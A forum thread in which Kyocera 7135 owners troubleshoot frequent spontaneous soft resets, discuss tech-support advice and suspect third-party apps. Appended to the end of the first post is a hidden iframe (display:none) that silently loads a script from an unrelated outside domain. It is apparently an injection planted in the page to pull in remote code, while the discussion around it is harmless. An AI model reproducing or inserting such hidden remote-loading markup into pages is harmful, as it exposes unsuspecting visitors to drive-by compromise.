+ Reply to Thread

Timing of soft resets

Just curious...

To those who have average more than one spontaneous soft reset (BSOD) per day, do you notice a pattern relating to when the soft reset actually occurs?

For instance does it occur while using a palm app? Just after a phone call? After sending or receiving a text message? While on the wireless web? Etc...

I've noticed that my soft resets initially begin after a phone call or after sending a text message. Then throughout the day I may experience another two or three at random intervals or after closing the flip.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Timing of soft resets

Originally posted by emeyer88
    Just curious...

To those who have average more than one spontaneous soft reset (BSOD) per day, do you notice a pattern relating to when the soft reset actually occurs?

For instance does it occur while using a palm app? Just after a phone call? After sending or receiving a text message? While on the wireless web? Etc...

I've noticed that my soft resets initially begin after a phone call or after sending a text message. Then throughout the day I may experience another two or three at random intervals or after closing the flip.
    Have you talked to Kyocera tech support yet? Occasional resets are not unusual with any Palm device, but you shouldn't be getting several per day. I have had the 7135 since the beginning of January and I can count on one hand the numebr of soft resets I have had, and no hard resets.

Alan

i have and they too confirmed that my problem is rather unique. They suggested that I charge the phone overnight on the cradle and then perform a hard reset. If that didn't cause an improvement in the phone, they suggested a swap for a new one.

So I followed that advice and for a few days I noticed an improvement (maybe one soft reset over the next three days). However, when I began to reinstall third party apps like datebk5, slap, bigclock, the problems picked up again. I'd love to be able to self diagnose the problem without going through the hassle of getting a new phone. But then again it looks like a new modelk may be inevitable.

Eric

Eric, your problem really sounds software related. I was having several soft resets every day too and thought I'd just have to live with it. Then, the phone started locking up after a botched up install. In trying to track down the problem I took nearly everything off that I'd installed. I fixed the problem and I haven't gotten around to reinstalling anything, but since I did that I haven't had many soft resets at all. Typcially when I do need to reset its while browsing the net on the included browser, which is really not such a great product in my opinion.
    Sorry, but I no longer make 7135 headset adapters.